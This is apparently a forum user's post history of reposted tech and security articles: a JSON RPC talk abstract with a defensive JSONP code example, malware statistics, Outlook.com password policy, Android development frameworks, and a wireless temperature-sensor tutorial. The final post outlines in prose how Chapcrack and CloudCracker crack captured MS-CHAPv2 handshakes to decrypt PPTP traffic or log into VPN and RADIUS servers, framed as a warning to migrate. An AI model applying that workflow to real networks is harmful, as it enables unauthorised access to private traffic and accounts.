Everything posted by Nytro
-
[h=2]JSON RPC[/h]
JSON RPC is a recently fashionable buzzword in the AJAX context. This lecture explains its principles, specifically the same origin policy for cross site scripting and its relation to JSON RPC, and demonstrates the essential implementation details using the example of the geocoding service in the google maps API.

The collection of technologies on which modern web applications are based is nowadays summarily referred to as AJAX, or "Asynchronous JavaScript and XML". Interestingly, the use of XML as the data format for the transfer between client and server is not only unnecessarily complicated, but in its usual incarnation as XMLHttpRequest it is also subject to restrictions that prevent the direct use of web services from the client side of the web application. A natural alternative to the transport of XML data structures through the XMLHttpRequest API is the transport of literal JavaScript expressions (nowadays also called JSON, or "JavaScript Object Notation") through dynamically created SCRIPT elements. We discuss practical aspects of the implementation of this approach and the consequences for architecture and software design of web applications. Because the circumvention of restrictions that were originally meant to maintain security might be frightening at first sight, we recapitulate the principles on which cross site scripting restrictions are based, and we discuss why their circumvention for the purpose of JSON/SCRIPT based data transport doesn't infract the security of a web application.

Authors: Steffen Meschkat
Submitted: August 05, 2012
Audio: IT Security and Hacking knowledge base - SecDocs
Slides: IT Security and Hacking knowledge base - SecDocs
Source file: 23C3-1568-en-json_rpc.m4v
Size: 88.7 MB
Download: http://dewy.fem.tu-ilmenau.de/CCC/23C3/video/23C3-1568-en-json_rpc.m4v
Source: IT Security and Hacking knowledge base - SecDocs
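The abstract above argues that loading JSON through a SCRIPT element is acceptable because the page only ever executes code from the service it chose to call. The following is an added example, not code from the lecture, from the forum post, or from the google maps API: it models the server half of that exchange in Node.js and emulates what the browser does with the response. The function names, the `/**/` prefix, the `example.invalid` URL in the comments and the geocoding-style payload are all constructed for this illustration.

```javascript
// Added example (not code from the lecture or from any real geocoding service):
// the JSON/SCRIPT ("JSONP") transport, seen from the server. The client side of the
// pattern, summarised from the abstract, is:
//   1. the page creates a <script> element whose src is the service URL plus a
//      callback parameter, e.g. https://example.invalid/geocode?q=...&callback=handleGeo
//      (example.invalid is a placeholder, not a real endpoint);
//   2. the same-origin policy does not restrict <script src>, so the browser fetches it;
//   3. the response is a JavaScript expression, which runs with the page's full privileges.
// Step 3 is the security-relevant point: the page trusts the service completely, so the
// service must emit exactly the literal it intends and must treat the callback name
// taken from the query string as code, not as data.

// A JSONP callback may be a dotted JavaScript identifier and nothing else.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;

function buildJsonpResponse(callbackName, payload) {
  if (typeof callbackName !== 'string' || !CALLBACK_RE.test(callbackName)) {
    throw new Error('refusing to echo a callback name that is not an identifier');
  }
  // JSON.stringify yields a valid JavaScript object literal, except that U+2028/U+2029
  // are legal inside JSON strings but are line terminators in JavaScript; escape them.
  const literal = JSON.stringify(payload)
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  // The leading comment is a conventional prefix so the response body never starts
  // with caller-chosen bytes; serve it as application/javascript with nosniff.
  return `/**/ ${callbackName}(${literal});`;
}

// Emulates what the browser does when the <script> element loads: the response text is
// executed as code in the page's global scope. `pageGlobals` stands in for that scope.
function runAsScriptTag(responseText, pageGlobals) {
  const names = Object.keys(pageGlobals);
  const fn = new Function(...names, responseText);
  fn(...names.map((n) => pageGlobals[n]));
}

// Constructed geocoding-style round trip: the "service" answers, the "page" receives.
function demoRoundTrip() {
  const received = [];
  const page = { handleGeo: (result) => received.push(result) };
  const response = buildJsonpResponse('handleGeo', {
    address: 'Example St 1', lat: 48.1, lng: 11.6,
  });
  runAsScriptTag(response, page);
  return { response, received };
}
```

The identifier check is what keeps a JSONP endpoint from becoming a reflected script injection point: everything after the validated name is produced by `JSON.stringify`, so the only code the page ever runs is the call it asked for. On the client side nothing can check the response at all, which is why the abstract's argument rests on the page choosing which service it loads.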
-
[h=2][infographic] Where Malware Comes From[/h]
Dan Rowinski · August 2nd, 2012

Malware is a worldwide problem. If there is electricity, an Internet connection and a computer, there will be viruses, worms, Trojans and other sneaky programs trying to gain access to your computer. Where do these nasty creatures come from?

A large percentage of the world’s malware comes from China. According to AlienVault’s Open Threat Exchange platform, China is the capital of malicious Internet addresses, based on 95,249 addresses analyzed. The United States comes in second with 60,346, well ahead of the third, fourth and fifth malware vectors: South Korea (16,115), Russia (13,367) and Taiwan (12,504).

How is this malware being delivered? The average virus wants to find its way into computers. Direct injection (where a virus is not hidden in a different type of file) is fairly rare. Far more commonly, malware hitches a ride on an otherwise benign file. This is the reason why security programs scan all files downloaded to a computer. The top malware-infested file type is .exe, the most common file type for a Windows program. The second most common carrier is HTML content, which can be found on almost any Web site as well as in emails. Zip and RAR files, which bundle together other file types, are the third most common, while Adobe PDF and Flash files are also prevalent malware delivery vehicles.

The top types of viruses are all associated with Windows. While Mac malware exists and is becoming more prevalent, the amount of Windows malware on the Internet is nothing short of stunning. The top five malware content types found by the AlienVault community are all derivations of Windows viruses.

Since February, the AlienVault Open Threat Exchange has analyzed over 5 million suspicious URLs. That is a drop in the bucket in comparison to the billions of sites on the Internet, but a large enough sample to provide a sense of how much malware is present on the Web. The company received nearly 30 million entries from its users and found a little more than a million malicious addresses. See the infographic below for more details.

The data was aggregated from AlienVault’s Open Threat Exchange from Feb. 20 to July 20, 2012. The data comes from the company’s customers as well as its Open Source Security Information Management (OSSIM), an open-source security information event-management platform.

Source: [infographic] Where Malware Comes From
-
[h=1]A quick look at security features on Microsoft's new Outlook.com email service[/h]
Posted on Sun, 05 Aug 2012 10:45 am EDT by Rich Edmonds

With the launch of Microsoft's Outlook.com, many have been questioning security features of the new email service. The most dominant topic is the limit of 16 characters for passwords. This is a limitation that was also present in Hotmail / Live and has been brought forward into its successor (due to Microsoft's login system). We'll take a look at this issue as well as a quick overview of additional security measures Microsoft has implemented to keep your emails safe.

Password character limitations

A counter question would be: do you honestly need more than 16 characters? It's an argument that could span a number of pages in a forum thread or accumulate a hundred or so comments on this article. One side could -- of course -- argue that using as many characters as possible is more secure due to the creation of more possible combinations. On the other hand, the password "123456789101112131415" is less secure than "3%84Dji8u&L8D", so it's more about how consumers create their account passwords. Using a random generator (or simply having some fun with random combinations in Notepad if you have the time) is always recommended - of course you should always note down what you've decided on. It's amusing to hear / read about company security holes due to employee passwords, "Admin" being the best example. It's certainly not rocket science.

Microsoft has responded to concerns about the 16 character limit, should you be interested to read an official response:

"We are working on increasing this. Unfortunately, for historical reasons, the password validation logic is decentralized across different products, so it's a bigger change than it should be and takes longer to get to market. It's also worth noting that the vast majority of compromised accounts are through malware and phishing. The small fraction of brute force is primarily common passwords like '123456' not due to a lack of complexity."

That being said, we can't see an issue with the 16 character limitation. It shouldn't worry consumers when using the service. LinkedIn is a superb example of how security can go horribly wrong. Check out the following Rapid7 infographic (click for larger version) on the most popular passwords that were reportedly already cracked prior to the account passwords being stolen. You'll be surprised by what made the list.

While we can understand the concern for the limitation and that those who are security obsessive would prefer to have a high amount of characters in passwords, it's not the end of the world should you ensure they're randomly generated with a sufficient combination of alphanumeric (and special) characters.

Single-use codes for masking account credentials

Microsoft has also implemented single-use codes for logging into Outlook.com when on a public computer or other devices where the user may be at risk of having their passwords detected. The single-use code enables Microsoft to text a passcode to the user's mobile phone (email and phone number required when attempting to login), which negates the need for the account password. The single-use code (as the name implies) can only be used once and is invalid once the user has successfully logged in. It's good to have extra protection in place for Outlook.com users to be able to access their email on computers / devices in public places.

Two-factor authentication and no targeted advertising

One of the major reasons Microsoft provides to attract Gmail users is that the company will not be reading emails to provide targeted and relevant advertising using its network of publishers - remember the Gmail man? This ensures user data is kept private. While advertising is present on main folder view pages, it's in the form of general adverts that will be displayed to everyone.

Microsoft has also responded to a question on Reddit inquiring about two-factor authentication in its global login system:

"Over the last 6 months we have rolled out two-factor authentication in several systems that use Microsoft account. For example, you need to use two-factor auth to buy stuff on xbox.com, to remotely fetch files from other computers on SkyDrive and more. We are learning a lot from this and have more in the works. We see two-factor auth as being an increasingly important piece of our protection suite."

What we can all take away from this is that Microsoft is working hard on further tightening security in its products and backend services. We can expect to see more information and updates applied to enhance protection already implemented. All-in-all, rather good stuff. Let us know your thoughts in the comments: do you believe Microsoft is doing enough to secure your data in the cloud?

Source: A quick look at security features on Microsoft's new Outlook.com email service | wpcentral | Windows Phone News, Forums, and Reviews
-
[h=2]Top 15 Android-Ready Application Development Frameworks[/h]
Wednesday, 01 August 2012 07:33 Eric Brown

On July 20, Adobe unveiled version 2.0 of the open source PhoneGap, a leader among the growing crowd of cross-platform, Android-compatible, mobile app frameworks. Open source developers welcomed new PhoneGap features such as a "Cordova WebView" function that enables developers to integrate code into larger native applications. There are scores of such frameworks to choose from these days, and as seen in our Top 15 list below, the best are getting quite sophisticated. Yet there is still considerable grumbling about the state of mobile cross-platform frameworks. They may be fine for the majority of Android apps being developed, yet few seem to be capable of handling all the requirements of a professional-quality enterprise or consumer app.

If you're familiar with Java and Eclipse, and Android is initially the sole destination, Google's Android SDK and related Android Development Tools (ADT) Eclipse plugin are probably the better choices. The problem is that most app publishers prefer to start with iOS, or else ship on iOS and Android simultaneously, with perhaps a BlackBerry or Windows Phone version as well. Others lack the experience to go native. Nevertheless, the official tools deserve a look, as it's usually difficult to port one's cross-platform effort to the Android SDK in mid-stream. So we'll start with Google's tools first before moving on to the multi-platform frameworks.

[h=2]Google's Tools Get Friendlier[/h]
Earlier this month, Google released Revision 20 of the SDK and ADT in conjunction with Android 4.1 ("Jelly Bean"), adding new debugging tools, application templates, and performance tweaks. Other Google tools include a native development kit (NDK) for hardware optimization and the Android Accessory gadget control application development kit (ADK).

Android now offers an arguably superior platform to iOS. It provides much more flexibility, better app testing, and easier app approvals. Yet when it comes to overall ease of use, Apple may still have the edge. Although Android uses an easier, more widely known language in Java, Android's rich feature set and multitasking features are harder to master, and version and device fragmentation can slow things down considerably. There are no easy fixes for these problems, but Google has at least worked hard to reduce the learning curve. Last month it revamped its Android Developers website to make it more accessible, following up on its previous launch of an Android training program and the publication of a style guide.

[h=2]Cross-Platform Frameworks Duke it Out[/h]
According to the Eclipse Open Source Developer Report 2012, 60 percent of open source developers writing Android or iOS apps use only the official SDK. Among those who use cross-platform frameworks, the choices, ranked from first to last, were:
- jQuery Mobile (28.6 percent)
- PhoneGap (17.9)
- Sencha Touch (7.9)
- Dojo Mobile (4.9)
- Titanium (2.8)

These multi-platform options are typically open source JavaScript frameworks with support for HTML5 and CSS. Aimed primarily at web developers, they are often used for migrating website content to app form. The frameworks support Android and iOS at a minimum, and often target BlackBerry, Windows Phone, and Symbian. Although they typically come with a "write once, run anywhere" promise, the amount of tweaking required for each version can still be considerable, and optimization of memory, battery life, and performance is often limited. Most of the frameworks offer drag-and-drop GUI design tools, and many incorporate APIs aimed at exploiting specific components like audio and GPS. Quite a few are built on the Model View Controller (MVC) UI and component interaction model.
[h=2]Platforms for Coding Beyond JavaScript[/h]
While PhoneGap and most of the leading frameworks are web-oriented HTML5/JavaScript apps that can tap native functions, some, like Appcelerator's Titanium, generate native Java code. While this approach has potential performance advantages, it tends to limit code reusability.

Some frameworks specialize in programming environments beyond JavaScript. For example:
- RhoMobile is designed for Ruby developers.
- MoSync is aimed at C++ hackers.
- C#-flavored Mono for Android appeals to enterprise-focused developers familiar with Visual Studio.

Game developers, meanwhile, tend to use gaming-focused frameworks that offer specialized level-creation features, game engines, and 3D animation support:
- Corona SDK (the main player here)
- Flixel
- Unity3D

Educational organizations and others with limited needs and limited resources can turn to codeless, cross-platform app-building environments like TheAppBuilder. Google abandoned its own codeless App Inventor, but it was recently re-launched by MIT as the MIT App Inventor.

[h=2]Other Android-Ready Options[/h]
On the opposite extreme, those aiming to develop complex applications, often in conjunction with new hardware, may prefer the robust, commercial Android-compatible platforms from embedded Linux OS vendors like Wind River, MontaVista, and Mentor Graphics. These are especially useful when targeting form factors beyond smartphones and tablets. The Wind River Platform for Android run-time environment includes an optimized Android SDK, middleware, device drivers, and testing suites, as well as vertical market accelerators.

Those looking to optimize their apps for particular processors can also find Android-ready tools from major ARM semiconductor vendors like Texas Instruments and Freescale, as well as ARM itself. Open source development board projects offer similar tools. MIPS and Intel, meanwhile, are building Android tools to support their own respective architectures.

Other Android-ready tools focus on particular steps in the development process. These include:
- Testing (Testroid, Appthwack)
- Performance management (Crittercism NDK)
- GUI design (DroidDraw, SPB UI Builder)

The latter category includes GUI tools from Motorola, HTC, and Samsung, designed for their respective UI skins. Finally, new cloud-oriented tools such as OpenMobster and Cumulus provide sync and other cloud support for Android apps.

[h=2]15 Android-Ready Development Frameworks[/h]
The following are 15 of the more popular Android development tools. Unless otherwise noted, they are open source, cross-platform frameworks:

Basic4android: Anywhere Software's commercial RAD tool and IDE for Android provides a comprehensive feature set and an object-oriented programming language similar to Visual Basic.
Basic4android (Basic for Android) - Android programming with Gui designer

Corona SDK: Widely used among game developers, Corona is also a popular, general-purpose framework. Corona Labs (formerly Ansca Mobile) claims an installed base of 120,000 developers. This high-end, commercial SDK offers over 500 APIs, as well as advertising and native UI support, and a built-in physics engine.
The Leader in Cross Platform Mobile App Development

DHTMLX Touch: This JavaScript and AJAX library focuses on UI widgets, and is aimed at building HTML5-based apps.
DHTMLX Touch - JavaScript Mobile Framework for Building HTML5 Web Apps

Dojo Mobile: The Dojo community's BSD-licensed HTML5/JavaScript framework has added MVC and app-controller packages, as well as mobile-specific components such as switches and sliders. A degree of PhoneGap compatibility is also available.
Dojo Mobile - The Dojo Toolkit

iUI: This lightweight web UI framework includes a JavaScript library, CSS support, and development images.
iUI - Mobile web framework for high-end devices

jQuery Mobile: This popular, lightweight HTML5-based framework is built on jQuery, and focuses on semantic markup, progressive enhancement, and themable design. It's the leading cross-platform framework among Eclipse open source developers.
jQuery Mobile | jQuery Mobile

Kendo UI: Telerik's HTML5/JavaScript framework is available in open source and commercial versions. Kendo UI offers a wide selection of UI widgets and plugins, and provides an MVVM framework, performance optimization, and validation and internationalization features.
Kendo UI - The Art of Web Development

Mono for Android: Xamarin's C#- and enterprise-oriented package is compatible with a similar iOS-based MonoTouch version, and can also share code with the C#-based Windows Phone. Mono supplies an environment conducive to Visual Basic developers, and is touted for its debugger and native binary compiler.
Xamarin

MoSync SDK: MoSync supports C++, HTML5/JavaScript, or both on up to nine different platforms. The SDK is touted as being compatible with PhoneGap, as well as MoSync's own new HTML5/JavaScript-based native mobile app developer/simulator, MoSync Reload.
Create iPhone and Android apps with JavaScript and C++ | cross-platform mobile application development

PhoneGap: Designed for JavaScript, HTML5, and CSS development, PhoneGap is now sponsored by Adobe and the Apache Foundation. The 2.0 version adds Windows Phone support, new CLI functions, and overhauled JavaScript libraries. It also debuts Cordova WebView, an embeddable HTML rendering control that uses Apache's Cordova-JS API for tasks such as integrating PhoneGap code into larger native apps.
PhoneGap | Home

RhoMobile Suite: Motorola's mature, business-oriented framework features RhoConnect, RhoStudio, RhoElements, and a new RhoHub used for cloud app-building. RhoMobile is built on the Ruby language, the Rails framework, and the MVC model.
RhoMobile Suite - Motorola Solutions USA

Sencha Touch 2: Sencha's popular HTML5/JavaScript framework provides 50 built-in components, state management, and an integrated MVC system. It now offers a free native packager that streamlines distribution to stores like Google Play.
http://www.sencha.com/products/touch/

SproutCore: This HTML5-driven framework offers a "clean" MVC architecture, and emphasizes performance optimization and scalability.
SproutCore

TheAppBuilder: JamPot's new HTML5-based native app-building app has received plenty of buzz. It features a codeless, drag-and-drop interface that lets users quickly build fairly rudimentary apps by filling in Q&A checklists. Highlights include extensive social networking integration and automated submissions to Google Play.
TheAppBuilder

Titanium: Appcelerator claims its Android/iOS framework supports over 5,000 device and mobile-OS APIs. Unlike the more web-oriented frameworks, Titanium uses JavaScript to create native code, with claimed benefits in performance.
Titanium SDK | Appcelerator

Additional Android-compatible development options include Andromo, Application Craft, Hypernext Android Creator (HAC), Jo, jQTouch, MIT App Inventor, Togosoft Device Browser, Unity Mobile, WebApp.Net, Wink Toolkit, xUI, and Zepto.js. For more options, check out these roundups of Android development software from BuildMobile, Daily Tekk, MobiGeni, and Technology Trend Analysis. Meanwhile, post your own favorites in the comments section below.

Source: https://www.linux.com/news/embedded-mobile/mobile-linux/612366-15-android-ready-application-development-frameworks-
-
[h=1]Building wireless sensor applications using Dorji’s DRF5150S and DRF4432S RF modules (Part 1)[/h]

Dorji Applied Technology is a China-based company that primarily focuses on building different types of RF modules that can be easily incorporated in designing wireless data loggers, sensor networks, telemetry and other wireless applications. Their products mostly use RF transceiver chips from ADI, Infineon, and Silicon Labs. Some of their RF modules have an additional preprogrammed microcontroller that allows direct interfacing of selected analog and digital sensors to the module. This means you don’t need any external MCU or to write code for these sensors. I have been playing with their DRF5150S and DRF4432S RF modules for the past couple of weeks and I should admit that they are very versatile and easy to use. In this blog post, I will describe these two modules briefly, and illustrate how to put them together to construct a simple wireless sensor application where data from a remote sensor are received and displayed on a PC, without using any external microcontrollers.

Dorji's DRF5150S wireless sensor module

DRF5150S transmitter module

DRF5150S is a 433 MHz ISM band transmitter module based on Infineon’s TDA5150 device, which is a low power, multiband, multichannel ASK/FSK/GFSK RF transmitter chip for the sub-1 GHz ISM bands (300-320 MHz, 425-450 MHz, 863-928 MHz) with RF output power of up to +10 dBm. The DRF5150S module also has an ultra-low power STM8L151 microcontroller on board that is preprogrammed to control the overall operation of the transmitter. The module operates from 2.1-3.6 V. The power supply and input/output pins are brought out to 0.1″ male header pins to make prototyping easier. The module can be configured to operate in one of the following two modes:

1. Data transmission mode
In data transmission mode the DRF5150S module acts as a normal data transmitter. It receives data from a host MCU through a standard UART serial port and then sends them out to the RF receiving module. The receiving RF module that can be used with the DRF5150S is the DRF4432S. We will talk about that later. The DRF5150S also features a sleep mode during which no data is transmitted and the module consumes only 1.5 µA of current.

2. Sensor data mode
The preprogrammed STM8L151 microcontroller on board allows you to connect selected digital and analog sensors directly to the DRF5150S module, which is a very nice feature of it. In this mode, the DRF5150S transmits the sensor data continuously at a preset interval along with its ID and the battery voltage information. The ID is useful to identify the source of transmission when there is more than one DRF5150S module transmitting. The ID is divided into two parts: Group ID and Slave ID. The Group ID of the receiving module (DRF4432S) should match the Group ID of the transmitting module, otherwise the receiver will ignore the transmitted data. However, multiple DRF5150S modules can share the same Group ID, but they should have different Slave IDs for identification on the receiving end. The module provides a 12-bit ADC channel that allows you to connect analog sensors, such as PT1000, LM34, LM35, TMP35, etc. It also features direct interfacing capability for DS18B20, SHT1X, and SHT2X digital sensors.

The following picture shows the DRF5150S module and its pin configuration. RXD and TXD are the UART receive and transmit lines. They have alternative functions based on the mode of operation.

DRF5150S pins

Configuration tool

As I mentioned earlier, the DRF5150S provides multiple modes of operation. The module can be configured for a particular mode using PC software, DRF Tool, downloadable from Dorji’s website. DRF Tool is a Windows based GUI application that communicates with the DRF5150S module connected to the PC through a USB-UART adapter. The TXD, RXD, VCC, and GND pins of the DRF5150S module should be connected to the corresponding pins of the USB-UART module. Note that the VCC voltage should be 3-3.6 V. Here is a snapshot of DRF Tool. All supported modes can be seen through the Sensor Type drop-down menu, and you pick the one that you want to configure your DRF5150S module to. There are a lot of other things that you can do with this tool, such as setting the TX interval, RF frequency and data rate, sensor ID, etc.

DRF Tool for configuring 5150S module

For illustrative purposes we will configure the transmitter module to DS18B20 High Resolution Mode. In this mode, a DS18B20 sensor can be directly interfaced to the DRF5150S module for measuring temperature with high resolution (12-bit). So we will select DS18B20 (High Resolution Mode) from the sensor type drop-down menu and set the transmitting interval to 2 seconds. The rest of the parameters are set as shown above. Now, we click on the Write W button to send these configuration settings to the DRF5150S module connected to the PC. The STM8L151 microcontroller on board receives this information and saves it into its internal EEPROM. The DRF5150S module is now configured for interfacing the DS18B20 temperature sensor. You should connect the sensor to the RF module as shown below.

Connecting a DS18B20 sensor to DRF5150S RF module

DRF5150S RF transmitter and DS18B20 sensor setup on breadboard

I have made this setup on a breadboard and powered the circuit with a 3 V coin cell battery (see the picture above). The DRF5150S reads 12-bit temperature data from the DS18B20 sensor and transmits it (with a 2 second interval) at a 50 kbps data rate using 434 MHz GFSK modulation. The transmitted data format of the DRF5150S is:

ID bytes (Group+Slave) + Data + BAT

The Group and Slave IDs are 1 byte each. The Data is 2 bytes long for the DS18B20 sensor. The last byte (BAT) contains the information of the battery strength. You can calculate the battery voltage from BAT as:

Battery voltage = (BAT+200)/100

Altogether 5 bytes are transmitted for each temperature sample.

Now let's look at the DRF4432S module, which is a matching receiver for the DRF5150S transmitter. In order to make this pair work together, they must be configured identically.

Dorji’s DRF4432S receiver module

The DRF4432S is a GFSK receiver module based on Silicon Laboratories’ Si4432 wireless ISM transceiver chip. This module is used together with the DRF5150S to build wireless sensor applications. It receives data from the DRF5150S transmitter module and transfers it through a UART serial interface. The picture below shows the pin diagram of the DRF4432S module. Please refer to the datasheet to find more details about these pins and their functions.

DRF4432S pins

The DRF4432S module must be configured in the same working mode as its complementary DRF5150S module. The configuration of the DRF4432S is done in a similar way using DRF Tool. Again you need to connect the DRF4432S to the PC using a USB-UART adapter. Make sure you choose the same parameters in DRF Tool for the receiver as you did for the transmitter. For our test application, the DRF4432S receiver module is also configured to DS18B20 High Resolution Mode, with RF frequency 434 MHz, RF data rate 50 kbps, and TX interval 2 sec. The transmitting and receiving modules can be configured to operate in a different frequency channel with 200 kHz spacing.

DRF4432S is configured similarly to DRF5150S

We now interface the DRF4432S to the PC through the USB-UART adapter so that the received data bytes can be transferred to the PC. A PC application is developed using the Processing language, which receives the data and displays them on screen. The Enable (EN) pin of the DRF4432S must be pulled low in order for it to work. If the EN pin is pulled high, the receiver goes into sleep mode. Since the DRF4432S has an on-board 3.3 V regulator, it can operate from 3.4 V to 5.5 V.

DRF4432S is connected to PC using a USB-UART adapter

DRF4432S and USB-UART connection

The output data format of the DRF4432S receiver is:

ID (group ID + slave ID) + Data + BAT + RSSI

It is the same as that of the transmitter module except there is an additional byte (RSSI) which gives the field strength of the received signal. A higher RSSI value means a more reliable wireless link. The product datasheet says that if RSSI < 64 at a 50 kbps RF data rate, then the field strength is considered weak and the probability of packet loss is high.

Processing application

The following Processing code is written to receive six bytes of data from the DRF4432S receiving module connected to the PC through a USB-UART interface. Information like the temperature of the remote station as sent by the DRF5150S module, the slave ID of the remote transmitting module, the battery voltage on the transmitting side, and the strength of the RF link between the transmitter and the receiver are extracted and displayed on the computer screen.
```java
/*
  Project: Wireless sensor application using DRF5150S and DRF4432S
  Written by: Rajendra Bhatt (www.embedded-lab.com)
  Date: 2012/08/2
*/

// Import serial communication library
import processing.serial.*;

// Variable declaration
PFont font22, font44, font14;
PFont font12;
float tempC;
float tempF;
float y, h, BattV, Slave_ID, Byte1, Byte2, Byte3, Byte4, Byte5, Byte6, RSSI;
Serial USB_UART;
int i, j, xx = -15;

void setup() {
  // Define size of window
  size(350, 350);
  // Set up fonts for use throughout the application
  font22 = loadFont("MicrosoftYaHei-22.vlw");
  font12 = loadFont("MicrosoftYaHei-12.vlw");
  font44 = loadFont("FranklinGothic-Demi-32.vlw");
  font14 = loadFont("TimesNewRomanPS-BoldMT-16.vlw");
  // Init serial communication port (COM6 is the USB-UART adapter on the author's PC)
  USB_UART = new Serial(this, "COM6", 9600);
}

void draw() {
  while (USB_UART.available() > 0) {
    // Read one six-byte frame: Group ID, Slave ID, Data low, Data high, BAT, RSSI.
    // The short delays give the remaining bytes of the frame time to arrive at 9600 baud.
    Byte1 = USB_UART.read();
    delay(20);
    Byte2 = USB_UART.read();
    delay(20);
    Byte3 = USB_UART.read();
    delay(20);
    Byte4 = USB_UART.read();
    delay(20);
    Byte5 = USB_UART.read();
    delay(20);
    Byte6 = USB_UART.read();

    background(250, 250, 250); // Near-white background

    // Thermometer bulb (red)
    fill(200, 6, 0);
    smooth();
    stroke(0);
    strokeWeight(2);
    ellipse(100, 280, 58, 50);

    // Thermometer tube: blue outline with a white interior
    noStroke();
    fill(0, 46, 200);
    arc(100, 60, 30, 20, PI, PI + PI);
    rect(85, 60, 30, 200);
    fill(250, 250, 250);
    rect(95, 60, 10, 200);

    // Marks on thermometer: Fahrenheit scale on the left
    stroke(0);
    strokeWeight(1);
    textAlign(RIGHT);
    fill(0, 46, 250);
    for (int i = 0; i < 5; i += 1) {
      line(70, 230 - 40 * i, 80, 230 - 40 * i);
      if (i < 4) line(75, 210 - 40 * i, 80, 210 - 40 * i);
      textFont(font12);
      text(str(40 + 20 * i), 65, 235 - 40 * i);
    }
    // Celsius scale on the right
    textAlign(LEFT);
    for (int i = 0; i < 6; i += 1) {
      line(118, 242 - 35 * i, 128, 242 - 35 * i);
      if (i < 5) line(118, 225 - 35 * i, 123, 225 - 35 * i);
      textFont(font12);
      text(str(0 + 10 * i), 135, 247 - 35 * i);
    }

    // Scale labels (degree signs drawn as small "o")
    noStroke();
    fill(0, 46, 250);
    textFont(font22);
    textAlign(LEFT);
    text("F", 57, 46);
    text("C", 135, 46);
    textFont(font12);
    text("o", 45, 35);
    text("o", 125, 35);
    fill(250, 90, 0);
    textFont(font22);
    text("o", 300 + xx, 45);
    text("o", 300 + xx, 85);

    // DS18B20 conversion: 16-bit raw value, 1/16 degree C per LSB
    tempC = Byte4 * 256 + Byte3;
    if (tempC >= 32768) tempC -= 65536; // the raw value is two's complement, so sub-zero readings wrap
    tempC = tempC / 16;
    BattV = (Byte5 + 200) / 100;
    Slave_ID = Byte2;
    tempF = ((tempC * 9) / 5) + 32;
    textFont(font44);
    RSSI = Byte6;
    text(nfc(tempC, 2), 200 + xx, 60);
    text(nfc(tempF, 2), 200 + xx, 100);
    text("C", 320 + xx, 60);
    text("F", 320 + xx, 100);
    textFont(font14);
    text("Battery Voltage =       V", 190 + xx, 140);
    text(nfc(BattV, 2), 313 + xx, 140);
    text("Signal Strength = ", 190 + xx, 160);
    text(nfc(RSSI, 0), 313 + xx, 160);
    text("Slave ID = ", 190 + xx, 180);
    text(nfc(Slave_ID, 0), 313 + xx, 180);

    // Raise mercury level in proportion to the Fahrenheit reading
    fill(200, 0, 0);
    y = -2.0 * tempF + 310;
    h = 270 - y;
    rect(95, y, 10, h);
  }
}
```

Download Processing source code and executables for different platforms (Windows, Linux, MacOS)

Output

I tested the setup by putting the DRF5150S sensor transmitter module on the front door porch of my house, with the receiver module connected to the PC in my spare bedroom on the second floor. The distance between the two is around 70 feet with no line of sight. The received signal strength is found to be 179 (out of 255), which is really good.

Wireless sensor transmitter on my front door porch

Data received by DRF4432S module are displayed on the computer screen

Summary

DRF5150S and DRF4432S are two complementary GFSK RF transmitter and receiver modules working in the 433 MHz ISM band and are manufactured by Dorji Applied Technology. The presence of a pre-programmed microcontroller on board allows you to connect selected analog and digital sensors directly to the DRF5150S module, which collects data from the sensor and sends it out to the DRF4432S module at a configurable interval. The transmitter and the receiver can both be configured to operate for a particular sensor type through PC software. For illustrative purposes, we constructed a very simple wireless sensor application where the DRF5150S module read 12-bit temperature data from a DS18B20 sensor and transmitted it continuously at an interval of 2 seconds. The DRF4432S receiver successfully received the temperature, ID, and battery strength bytes sent by the DRF5150S module and transferred the data to a PC through a USB-UART interface. A Processing application was developed to display the received data on the computer screen. More features and applications of these two RF modules will be explored in the second part of this tutorial. So stay tuned!

Source: Building wireless sensor applications using Dorji’s DRF5150S and DRF4432S RF modules (Part 1) : Embedded Lab
-
[h=2]Chapcrack and CloudCracker unlock MS-CHAPv2 based VPN Traffic[/h] For those of us who missed David Hulton and Moxie Marlinspike’s Defcon 20 presentation on cracking MS-CHAPv2, here is an overview: 1) All users and providers of PPTP VPN solutions should immediately start migrating to a different VPN protocol. PPTP traffic should be considered unencrypted. 2) Enterprises who are depending on the mutual authentication properties of MS-CHAPv2 for connection to their WPA2 RADIUS servers should immediately start migrating to something else. That is all, have a nice day… Wait a minute, “PPTP traffic should be considered unencrypted,” what??? A recently released article by Moxie explains in detail how they are able to crack MS-CHAPv2 communication, used in many PPTP based VPNs, with a 100% success rate. But that is not all: the protocol is also used in WPA2 enterprise environments for connecting to RADIUS authentication servers. Ouch… When VPNs started to become popular I remember the constant mantra that remote VPN communication is safe because it uses PPTP, safely encapsulating your traffic before sending it over the web. Well, it looks like this may not be the case anymore. From Moxie’s article, the weakness lies in the user password hash and the three DES keys used in the encoding operation: “The hash we’re after, however, is used as the key material for three DES operations. DES keys are 7 bytes long, so each DES operation uses a 7 byte chunk of the MD4 hash output. This gives us an opportunity for a classic divide and conquer attack. Instead of brute forcing the MD4 hash output directly (a complexity of 2^128), we can incrementally brute force 7 bytes of it at a time.“ The keys come from the output of the MD4 of the password, which is only 16 bytes. Microsoft fills in the difference by padding the last key with zeros. In doing so, this can significantly reduce the cracking time.
Moxie created a tool called Chapcrack that will pull the necessary information from a network packet capture and cracks the third DES key. But this still leaves the first two DES keys, which could take a long time to crack. Unless, that is, you take the output from Chapcrack and upload it to CloudCracker. CloudCracker is an online password cracking service that connects to a mean FPGA based box built by Pico Computing that they claim can crack any DES key within 24 hours: “They were able to build an FPGA box that implemented DES as a real pipeline, with one DES operation for each clock cycle. With 40 cores at 450mhz, that’s 18 billion keys/second. With 48 FPGAs, the Pico Computing DES cracking box gives us a worst case of ~23 hours for cracking a DES key, and an average case of about half a day.” So basically, if you can get a network packet capture, you can use Chapcrack to pull the DES key from it, and then pass it to CloudCracker to crack it within 24 hours. Then you can decrypt the entire network packet capture, or log in to the user’s VPN or RADIUS server. Nice… Looks like it is time to move on from MS-CHAPv2 based security products. Sursa: Chapcrack and CloudCracker unlock MS-CHAPv2 based VPN Traffic
